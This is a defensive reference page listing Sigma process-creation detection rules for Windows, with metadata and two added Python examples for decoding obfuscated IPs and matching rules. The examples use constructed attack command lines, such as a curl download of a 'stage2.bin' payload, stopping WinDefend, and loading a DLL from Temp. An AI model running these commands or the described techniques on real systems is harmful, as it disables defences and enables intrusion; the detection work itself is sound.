filename proc_creation_win_remote_access_tools_anydesk_susp_exec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Disabled Volume Snapshots

Detects commands that temporarily turn off Volume Snapshots

Internal MISP references

UUID dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a which can be used as unique global reference for Disabled Volume Snapshots in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/01/28
falsepositive ['Legitimate administration']
filename proc_creation_win_reg_volsnap_disable.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Microsoft IIS Connection Strings Decryption

Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or similar can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password, using the aspnet_regiis command.

Internal MISP references

UUID 97dbf6e2-e436-44d8-abee-4261b24d3e41 which can be used as unique global reference for Microsoft IIS Connection Strings Decryption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/28
falsepositive ['Unknown']
filename proc_creation_win_iis_connection_strings_decryption.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Dumping Process via Sqldumper.exe

Detects process dump via legitimate sqldumper.exe binary

Internal MISP references

UUID 23ceaf5c-b6f1-4a32-8559-f2ff734be516 which can be used as unique global reference for Dumping Process via Sqldumper.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate MSSQL Server actions']
filename proc_creation_win_lolbin_susp_sqldumper_activity.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Use Icacls to Hide File to Everyone

Detects use of icacls to deny access to everyone on a path under the Users folder, which is sometimes used to hide malicious files

Internal MISP references

UUID 4ae81040-fc1c-4249-bfa3-938d260214d9 which can be used as unique global reference for Use Icacls to Hide File to Everyone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/18
falsepositive ['Legitimate use']
filename proc_creation_win_icacls_deny.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Obfuscated IP Via CLI

Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line

Internal MISP references

UUID 56d19cb4-6414-4769-9644-1ed35ffbb148 which can be used as unique global reference for Obfuscated IP Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unknown']
filename proc_creation_win_susp_obfuscated_ip_via_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery']
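The rule above looks for the encoded forms themselves; when one fires, the analyst still wants the real address. The following is an added example (not code from the Sigma project or the MISP galaxy) that finds hex, octal, mixed and single-dword IP literals in a command line and decodes them with the inet_aton rules that ping, curl and similar tools apply (with fewer than four parts, the last part fills the remaining bytes). The sample command lines are constructed; the 2**24 threshold for bare numbers is a heuristic chosen for the example to keep PIDs and ports out of the results.

```python
import re
import socket
import struct
from typing import Optional

# A candidate is 1 to 4 dot-separated parts, each decimal, octal (leading 0) or
# hex (0x); it must not be glued to other word characters or dots, so version
# strings such as "python3.9" or a trailing "1.2.3.4." are not picked up.
_CANDIDATE = re.compile(
    r"(?<![\w.])(?:0x[0-9a-f]+|\d+)(?:\.(?:0x[0-9a-f]+|\d+)){0,3}(?![\w.])", re.I
)


def _is_nonplain(part: str) -> bool:
    """True for hex (0x..) or octal (leading zero) parts, the obfuscated forms."""
    p = part.lower()
    return p.startswith("0x") or (len(p) > 1 and p.startswith("0"))


def _part_value(part: str) -> int:
    p = part.lower()
    if p.startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)  # raises ValueError on digits 8/9, i.e. not octal
    return int(p, 10)


def decode_ip_literal(token: str) -> Optional[str]:
    """Decode an inet_aton-style literal into dotted-quad form.

    With 1 part the value is the whole 32-bit address; with 2..4 parts the
    last part fills the remaining bytes (so 127.1 is 127.0.0.1). Returns
    None when the token is not a valid literal.
    """
    try:
        vals = [_part_value(p) for p in token.split(".")]
    except ValueError:
        return None
    head, last = vals[:-1], vals[-1]
    if any(not 0 <= v <= 255 for v in head):
        return None
    last_bytes = 4 - len(head)
    if not 0 <= last < (1 << (8 * last_bytes)):
        return None
    addr = 0
    for v in head:
        addr = (addr << 8) | v
    addr = (addr << (8 * last_bytes)) | last
    return socket.inet_ntoa(struct.pack("!I", addr))


def find_obfuscated_ips(command_line: str) -> list[tuple[str, str]]:
    """Return (token, decoded dotted quad) for each obfuscated IP in the command line.

    Plain dotted-decimal addresses are ignored. A single-part literal (decimal,
    hex or octal) is only reported when its value is at least 2**24, i.e. it
    would have a non-zero first octet; this keeps PIDs and ports out without
    losing the usual dword form (heuristic assumed for this example).
    """
    findings = []
    for m in _CANDIDATE.finditer(command_line):
        tok = m.group(0)
        parts = tok.split(".")
        if len(parts) == 1:
            try:
                if _part_value(tok) < (1 << 24):
                    continue
            except ValueError:
                continue
        elif not any(_is_nonplain(p) for p in parts):
            continue  # plain dotted form, or a short form like 127.1 (not flagged)
        decoded = decode_ip_literal(tok)
        if decoded is not None:
            findings.append((tok, decoded))
    return findings


# Constructed sample command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    "ping 0x7f000001",
    "ping 2130706433",
    "ping 0177.0.0.1",
    "curl http://0x7f.0.0.1/stage2.bin",
    "ping 127.0.0.1",
    "taskkill /PID 1234",
    "ping 0xC0A80001",
]

if __name__ == "__main__":
    for cl in SAMPLE_COMMAND_LINES:
        print(f"{cl:40} -> {find_obfuscated_ips(cl)}")
```

Short dotted forms such as `127.1` decode correctly but are deliberately not reported, because the same shape is a version number in most command lines; if that form matters in an environment, the `elif` branch is where to relax it.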

Query Usage To Exfil Data

Detects usage of the system binary "query.exe" to collect information such as "sessions" and "processes" for later exfiltration or use

Internal MISP references

UUID 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2 which can be used as unique global reference for Query Usage To Exfil Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unknown']
filename proc_creation_win_query_session_exfil.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Wusa.EXE Extracting Cab Files From Suspicious Paths

Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract a cab file using the "/extract" argument from suspicious paths

Internal MISP references

UUID c74c0390-3e20-41fd-a69a-128f0275a5ea which can be used as unique global reference for Wusa.EXE Extracting Cab Files From Suspicious Paths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Unknown']
filename proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

SyncAppvPublishingServer Execute Arbitrary PowerShell Code

Detects the execution of arbitrary PowerShell code via "SyncAppvPublishingServer.exe".

Internal MISP references

UUID fbd7c32d-db2a-4418-b92c-566eb8911133 which can be used as unique global reference for SyncAppvPublishingServer Execute Arbitrary PowerShell Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/12
falsepositive ['App-V clients']
filename proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Stop Windows Service Via Sc.EXE

Detects the stopping of a Windows service via the "sc.exe" utility

Internal MISP references

UUID 81bcb81b-5b1f-474b-b373-52c871aaa7b1 which can be used as unique global reference for Stop Windows Service Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/05
falsepositive ["There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly"]
filename proc_creation_win_sc_stop_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.
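Several of the process_creation rules on this page (New DLL Registered Via Odbcconf.EXE, Add SafeBoot Keys Via Reg Utility, Suspicious DLL Loaded via CertOC.EXE, Suspicious Execution of InstallUtil Without Log, and Stop Windows Service Via Sc.EXE) share one shape: an Image suffix plus one or more CommandLine substrings, combined with Sigma's AND-of-selections / OR-within-a-list semantics and case-insensitive string matching. The following is an added example (not code from the Sigma project or the MISP galaxy) that expresses those five rules in that reduced form and runs them over constructed Sysmon Event ID 1-style records. The selection values are approximations of what the rule descriptions say, not copies of the rule files, and the suspicious-path list is an assumption for the example.

```python
# Paths from which a loaded DLL is treated as suspicious (assumption for this example).
SUSP_PATHS = [
    "\\AppData\\Local\\Temp\\",
    "\\Users\\Public\\",
    "\\Windows\\Temp\\",
    "\\Downloads\\",
    "\\Desktop\\",
]

# Rule = title, level, selections. All selections must hold (Sigma 'and');
# a selection holds if any of its (field, modifier, value) triples matches
# (Sigma's list semantics). Modifiers mirror Sigma: endswith, contains,
# contains_all. Matching is case-insensitive, as in Sigma.
RULES = [
    {"title": "New DLL Registered Via Odbcconf.EXE", "level": "medium",
     "selections": [
         [("Image", "endswith", "\\odbcconf.exe")],
         [("CommandLine", "contains", "REGSVR")],
     ]},
    {"title": "Add SafeBoot Keys Via Reg Utility", "level": "high",
     "selections": [
         [("Image", "endswith", "\\reg.exe")],
         [("CommandLine", "contains", " add "), ("CommandLine", "contains", " copy ")],
         [("CommandLine", "contains", "\\SafeBoot\\")],
     ]},
    {"title": "Suspicious DLL Loaded via CertOC.EXE", "level": "high",
     "selections": [
         [("Image", "endswith", "\\certoc.exe")],
         [("CommandLine", "contains", "-LoadDLL")],
         [("CommandLine", "contains", p) for p in SUSP_PATHS],
     ]},
    {"title": "Suspicious Execution of InstallUtil Without Log", "level": "medium",
     "selections": [
         [("Image", "endswith", "\\InstallUtil.exe")],
         [("CommandLine", "contains_all", ["/logfile=", "/LogToConsole=false"])],
     ]},
    {"title": "Stop Windows Service Via Sc.EXE", "level": "low",
     "selections": [
         [("Image", "endswith", "\\sc.exe")],
         [("CommandLine", "contains", " stop ")],
     ]},
]


def _matches(field_value, modifier, value):
    fv = field_value.lower()
    if modifier == "endswith":
        return fv.endswith(value.lower())
    if modifier == "contains":
        return value.lower() in fv
    if modifier == "contains_all":
        return all(v.lower() in fv for v in value)
    raise ValueError(f"unknown modifier {modifier}")


def rule_matches(rule, event):
    """Every selection must hold; within a selection any triple suffices."""
    return all(
        any(_matches(event.get(field, ""), mod, val) for field, mod, val in selection)
        for selection in rule["selections"]
    )


def evaluate(events, rules=RULES):
    """Return (rule title, level, CommandLine) for every rule/event hit."""
    return [
        (rule["title"], rule["level"], ev["CommandLine"])
        for ev in events
        for rule in rules
        if rule_matches(rule, ev)
    ]


# Constructed process_creation events (Sysmon Event ID 1 field names); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\odbcconf.exe",
     "CommandLine": "odbcconf.exe /a {REGSVR C:\\Users\\Public\\helper.dll}"},
    {"Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\svc1 /ve /t REG_SZ /d Service /f"},
    {"Image": "C:\\Windows\\System32\\certoc.exe",
     "CommandLine": "certoc.exe -LoadDLL C:\\Users\\bob\\AppData\\Local\\Temp\\x.dll"},
    {"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe",
     "CommandLine": "InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Users\\Public\\a.exe"},
    {"Image": "C:\\Windows\\System32\\sc.exe", "CommandLine": "sc stop WinDefend"},
    # Benign: reads the SafeBoot key instead of writing it
    {"Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal"},
    # Benign: odbcconf without a REGSVR action
    {"Image": "C:\\Windows\\System32\\odbcconf.exe", "CommandLine": "odbcconf.exe /?"},
]

if __name__ == "__main__":
    for title, level, cl in evaluate(SAMPLE_EVENTS):
        print(f"[{level:6}] {title}: {cl}")
```

Two limits of this reduced form are worth keeping in mind when tuning: matching on Image alone is defeated by renaming the binary (the Sigma rules typically also match OriginalFileName for that reason), and odbcconf can take its REGSVR action from a response file (`/f file.rsp`), in which case the keyword never appears on the command line and only the file itself would reveal it.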

Use of Wfc.exe

Detects execution of "wfc.exe", the Workflow Command-line Compiler, which can be used for application whitelisting (AWL) bypass and is listed in Microsoft's recommended block rules.

Internal MISP references

UUID 49be8799-7b4d-4fda-ad23-cafbefdebbc5 which can be used as unique global reference for Use of Wfc.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/01
falsepositive ['Legitimate use by a software developer']
filename proc_creation_win_lolbin_wfc.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Suspicious SysAidServer Child

Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)

Internal MISP references

UUID 60bfeac3-0d35-4302-8efb-1dd16f715bc6 which can be used as unique global reference for Suspicious SysAidServer Child in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/26
falsepositive ['Unknown']
filename proc_creation_win_java_sysaidserver_susp_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1210']
Related clusters

To see the related clusters, click here.

Whoami.EXE Execution Anomaly

Detects the execution of whoami.exe with suspicious parent processes.

Internal MISP references

UUID 8de1cbe8-d6f5-496d-8237-5f44a721c7a0 which can be used as unique global reference for Whoami.EXE Execution Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/12
falsepositive ['Admin activity', 'Scripts and administrative tools used in the monitored environment', 'Monitoring activity']
filename proc_creation_win_whoami_parent_anomaly.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

HackTool - SharpChisel Execution

Detects usage of SharpChisel via its command line arguments

Internal MISP references

UUID cf93e05e-d798-4d9e-b522-b0248dc61eaf which can be used as unique global reference for HackTool - SharpChisel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/05
falsepositive ['Unlikely']
filename proc_creation_win_hktl_sharp_chisel.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

Suspicious GUP Usage

Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks

Internal MISP references

UUID 0a4f6091-223b-41f6-8743-f322ec84930b which can be used as unique global reference for Suspicious GUP Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/02/06
falsepositive ['Execution of tools named GUP.exe and located in folders different than Notepad++\updater']
filename proc_creation_win_gup_suspicious_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of DiskShadow.EXE

Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.

Internal MISP references

UUID 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 which can be used as unique global reference for Potentially Suspicious Child Process Of DiskShadow.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/15
falsepositive ['False positives can occur in cases where admin scripts leverage the "exec" flag to execute applications']
filename proc_creation_win_diskshadow_child_process_susp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - Ngrok Execution

Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections.

Internal MISP references

UUID ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31 which can be used as unique global reference for PUA - Ngrok Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/14
falsepositive ['Another tool that uses the command line switches of Ngrok', 'Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)']
filename proc_creation_win_pua_ngrok.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Gpscript Execution

Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy

Internal MISP references

UUID 1e59c230-6670-45bf-83b0-98903780607e which can be used as unique global reference for Gpscript Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/16
falsepositive ['Legitimate uses of logon scripts distributed via group policy']
filename proc_creation_win_lolbin_gpscript.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Phishing Pattern ISO in Archive

Detects cases in which an ISO file is opened within an archiver like 7-Zip or WinRAR, which is a sign of phishing, as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of the web)

Internal MISP references

UUID fcdf69e5-a3d3-452a-9724-26f2308bf2b1 which can be used as unique global reference for Phishing Pattern ISO in Archive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/07
falsepositive ['Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction']
filename proc_creation_win_susp_archiver_iso_phishing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1566']
Related clusters

To see the related clusters, click here.

Potential Recon Activity Via Nltest.EXE

Detects nltest commands that can be used for information discovery

Internal MISP references

UUID 5cc90652-4cbd-4241-aa3b-4b462fa5a248 which can be used as unique global reference for Potential Recon Activity Via Nltest.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Craig Young, oscd.community, Georg Lauenstein
creation_date 2021/07/24
falsepositive ['Legitimate administration use but user and host must be investigated']
filename proc_creation_win_nltest_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1016', 'attack.t1482']
Related clusters

To see the related clusters, click here.

CMSTP UAC Bypass via COM Object Access

Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)

Internal MISP references

UUID 4b60e6f2-bf39-47b4-b4ea-398e33cfe253 which can be used as unique global reference for CMSTP UAC Bypass via COM Object Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman, Christian Burkard (Nextron Systems)
creation_date 2019/07/31
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename proc_creation_win_uac_bypass_cmstp_com_object_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001']

CMSTP Execution Process Creation

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Internal MISP references

UUID 7d4cdc5a-0076-40ca-aac8-f7e714570e47 which can be used as unique global reference for CMSTP Execution Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman
creation_date 2018/07/16
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename proc_creation_win_cmstp_execution_by_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001']

Arbitrary Command Execution Using WSL

Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands

Internal MISP references

UUID dec44ca7-61ad-493c-bfd7-8819c5faa09b which can be used as unique global reference for Arbitrary Command Execution Using WSL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/05
falsepositive ['Automation and orchestration scripts may use this method to execute scripts etc.', 'Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)']
filename proc_creation_win_wsl_lolbin_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']

Malicious Base64 Encoded PowerShell Keywords in Command Lines

Detects base64 encoded strings used in hidden malicious PowerShell command lines

Internal MISP references

UUID f26c6093-6f14-4b12-800f-0fcb46f5ffd0 which can be used as unique global reference for Malicious Base64 Encoded PowerShell Keywords in Command Lines in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author John Lambert (rule)
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_hidden_flag.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Potential Product Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall and antivirus products

Internal MISP references

UUID 15434e33-5027-4914-88d5-3d4145ec25a9 which can be used as unique global reference for Potential Product Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_product.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']

Suspicious XOR Encoded PowerShell Command

Detects the presence of a potentially XOR-encoded PowerShell command

Internal MISP references

UUID bb780e0c-16cf-4383-8383-1e5471db6cf9 which can be used as unique global reference for Suspicious XOR Encoded PowerShell Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
creation_date 2018/09/05
falsepositive ['Unknown']
filename proc_creation_win_powershell_xor_commandline.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059.001', 'attack.t1140', 'attack.t1027']

Suspicious Shells Spawn by Java Utility Keytool

Detects a suspicious shell spawned from the Java utility keytool process (e.g. ADSelfService Plus exploitation)

Internal MISP references

UUID 90fb5e62-ca1f-4e22-b42e-cc521874c938 which can be used as unique global reference for Suspicious Shells Spawn by Java Utility Keytool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021/12/22
falsepositive ['Unknown']
filename proc_creation_win_java_keytool_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']

Remote PowerShell Session Host Process (WinRM)

Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (a sign of an active PowerShell remote session).

Internal MISP references

UUID 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 which can be used as unique global reference for Remote PowerShell Session Host Process (WinRM) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/09/12
falsepositive ['Legitimate usage of remote Powershell, e.g. for monitoring purposes.']
filename proc_creation_win_winrm_remote_powershell_session_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.t1021.006']

HackTool - XORDump Execution

Detects suspicious use of XORDump process memory dumping utility

Internal MISP references

UUID 66e563f9-1cbd-4a22-a957-d8b7c0f44372 which can be used as unique global reference for HackTool - XORDump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/28
falsepositive ['Another tool that uses the command line switches of XORdump']
filename proc_creation_win_hktl_xordump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']

PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE

Detects Active Directory enumeration activity using known AdFind CLI flags

Internal MISP references

UUID 455b9d50-15a1-4b99-853f-8d37655a4c1b which can be used as unique global reference for PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/13
falsepositive ['Authorized administrative activity']
filename proc_creation_win_pua_adfind_enumeration.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002']

PDQ Deploy Remote Administration Tool Execution

Detects use of the PDQ Deploy remote administration tool

Internal MISP references

UUID d679950c-abb7-43a6-80fb-2a480c4fc450 which can be used as unique global reference for PDQ Deploy Remote Administration Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/01
falsepositive ['Legitimate use']
filename proc_creation_win_pdqdeploy_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.lateral_movement', 'attack.t1072']

Proxy Execution Via Wuauclt.EXE

Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.

Internal MISP references

UUID af77cf95-c469-471c-b6a0-946c685c4798 which can be used as unique global reference for Proxy Execution Via Wuauclt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_wuauclt_dll_loading.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution']

WMI Persistence - Script Event Consumer

Detects WMI script event consumers

Internal MISP references

UUID ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e which can be used as unique global reference for WMI Persistence - Script Event Consumer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2018/03/07
falsepositive ['Legitimate event consumers', 'Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button']
filename proc_creation_win_wmi_persistence_script_event_consumer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.003']

Execute Code with Pester.bat

Detects code execution via Pester.bat (Pester is a PowerShell module for testing)

Internal MISP references

UUID 59e938ff-0d6d-4dc3-b13f-36cc28734d4e which can be used as unique global reference for Execute Code with Pester.bat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate use of Pester for writing tests for Powershell scripts and modules']
filename proc_creation_win_lolbin_pester_1.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1216']

Potential Mftrace.EXE Abuse

Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe), which can be abused to execute arbitrary binaries.

Internal MISP references

UUID 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e which can be used as unique global reference for Potential Mftrace.EXE Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/09
falsepositive ['Legitimate use for tracing purposes']
filename proc_creation_win_mftrace_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']

Potential Command Line Path Traversal Evasion Attempt

Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline

Internal MISP references

UUID 1327381e-6ab0-4f38-b583-4c1b8346a56b which can be used as unique global reference for Potential Command Line Path Traversal Evasion Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Google Drive', 'Citrix']
filename proc_creation_win_susp_commandline_path_traversal_evasion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']

Regsvr32 Execution From Highly Suspicious Location

Detects execution of regsvr32 where the DLL is located in a highly suspicious location

Internal MISP references

UUID 327ff235-94eb-4f06-b9de-aaee571324be which can be used as unique global reference for Regsvr32 Execution From Highly Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/26
falsepositive ['Unlikely']
filename proc_creation_win_regsvr32_susp_exec_path_2.yml
level high
logsource.category process_creation
logsource.product windows
